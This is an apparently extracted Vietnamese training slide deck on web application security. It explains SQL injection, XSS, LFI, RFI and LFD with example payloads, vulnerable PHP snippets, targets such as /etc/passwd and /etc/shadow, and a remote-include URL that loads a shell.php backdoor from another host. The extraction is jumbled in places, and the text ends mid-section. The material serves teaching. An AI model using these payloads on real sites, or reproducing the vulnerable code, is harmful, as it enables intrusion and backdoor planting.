Professional Documents
Culture Documents
Date: 1-5-2015
ABOUT AUTHOR
Client – Side
• MySQL
• HTML + CSS / HTML5 + CSS3 MariaDB
• Apache (httpd) •
• Javascript / Jquery
• Nginx + + •
•
MongoDB
MemSQL
Server - Side • Access
• IIS • SQLserver
• PHP • MSSQL
• Apache Tomcat • ASPX (ASP.NET) • ……..
• JSP + Servlet (JAVA)
Web Application Security
• Thông qua Authencation (Các hình thức tấn công vào mật khẩu, giao thức mã hoá, hình thức chứng thực,…)
• Thông qua Session, Transport,…. (Các hình thức tấn công qua bảo mật đường truyền bao gồm cả MITM)
10 quy chuẩn bảo mật và cũng là 10 phân nhóm lỗ hổng bảo mật ứng dụng web theo OWASP 2010.
Định nghĩa:
SQL injection (SQLi) là một kỹ thuật cho phép những kẻ tấn công lợi dụng lỗ
hổng của việc kiểm tra dữ liệu đầu vào trong các ứng dụng web và các thông
báo lỗi của hệ quản trị cơ sở dữ liệu trả về để inject (tiêm vào) và thi hành các
câu lệnh SQL bất hợp pháp
Web Application Security
1. SQL injection
Ví dụ:
Truy cập chuyên mục SQL trên ceh.vn thấy URL có dạng: http://ceh.vn /index.php?page=SQl
è Câu truy vấn CSDL có dạng: “SELECT * FROM chuyenmuc WHERE tenchuyenmuc =“ + $page
Trong đó có thể $page=$_GET(‘tenpage’)
Attacker cố tình truy vấn trên URL: http://ceh.vn /index.php?page=SQl or 1=1
è Câu truy vấn CSDL có dạng: SELECT * FROM chuyenmuc WHERE tenchuyenmuc=SQl or 1=1
Ta thấy vì 1=1 luôn đúng nên truy vấn trả lại tất cả những thông tin có trong bảng chuyenmuc
⇒ Thông tin bị khai thác => Lỗi.
Attacker có thể thực hiện truy vấn phức tạp hơn, truy vấn các cột, trường, thông tin quan trọng hơn.
Web Application Security
2. XSS
Định nghĩa:
XSS xuất hiện khi một ứng dụng web cho phép người dùng nhập các dữ liệu vào mà
không thông qua kiểm duyệt nội dung, những dữ liệu này sẽ tương tác trực tiếp với
những người dùng khác cùng sử dụng website. Nguy cơ tạo ra là hacker có thể
chèn các mã kịch bản như HTML, Javascript… (client side) nhằm ăn cắp
SessionCookie, thay đổi giao diện (deface) hoặc chuyển hướng đến trang có mã
độc khác.
Web Application Security
2. XSS
Định nghĩa:
Web Application Security
2. XSS
Ví dụ:
Code lây $name trực tiếp từ giá trị khung name và in ra thẳng: if(!empty($_GET['name']))
Khi attacker không truy vấn bình thường mà inject mã javascript {
vào khung name ó Truyền $name=$_GET['name'];
giá trị trực tiếp cho biến name: print $name;
<script>alert(“Crazykid”)</script> } else {
Lúc này được javascript được gán cho biến name và in ra
Như một câu lệnh chứ không phải là 1 truy vấn bình thường
ó đoạn javascript độc hại của attacker được thực thi
Web Application Security
3. LFI
Định nghĩa:
Lỗ hổng cho phép các attacker có thể truy vấn các tập tin nhạy cảm trên
web server và đọc được
Nội dung các tập tin đó. Ví dụ các tập tin nhạy cảm: /etc/passwd, /etc/
shadow, httpd.conf,……
Web Application Security
3. LFI
Ví dụ:
Truy cập chuyên mục SQL trên ceh.vn thấy URL có dạng: http://ceh.vn /index.php?page=SQl
Chú ý ../ là chuyển lên một thư mục trong Linux. Nếu server windows thì dung ..\ ó URL lencode = %5C
Web Application Security
3. RFI
Định nghĩa:
Cho phép attack gọi đến một file trên web server hoặc trên server khác ngay tại web
server này.
Ví dụ:
http://ceh.vn/page?=http://www.vietnamnet.vn
Nếu ceh.vn bị lỗi RFI thì nội dung trang vietnamnet.vn sẽ hiển hị trên ceh.vn
Nếu attacker đặt backdoor trên vietnamnet.vn dạng:
http://www.vietnamnet.vn/shell.php
Tại ceh.vn attacker truy vấn: http://ceh.vn/page?=www.vietnamnet.vn/shell.php
Thì nội dung backdoor shell.php sẽ được include vào source code của ceh.vn ó ta cắm
backdoor trưc tiếp trên ceh.vn
Web Application Security
3. RFI
Ví dụ:
Code:
<?php
Input: $test=$_GET['test'];
include $test.'id=1';
http://xx.xx.xx.xx/CEH/RFI/3test.php?test=http://ceh.vn/shell.txt
?>
Và register_globals = off
Out:
Web Application Security
3. LFD
Định nghĩa:
Giống LFI nhưng thay vì attacker có thể đọc các file nhạy cảm thì ở đây attacker có thể
Download các file nhạy cảm về máy
Web Application Security
3. LFD
Ví dụ:
• Ở vị trí attacker tấn công Opensource hoặc ở vị trị quản trị/chuyên gia an ninh kiểm thử Whitehat:
Đọc source code, Debug Source code tìm lổ hổng.
• Tấn công CloseSource, Đa số, kiểm thử Blackbox: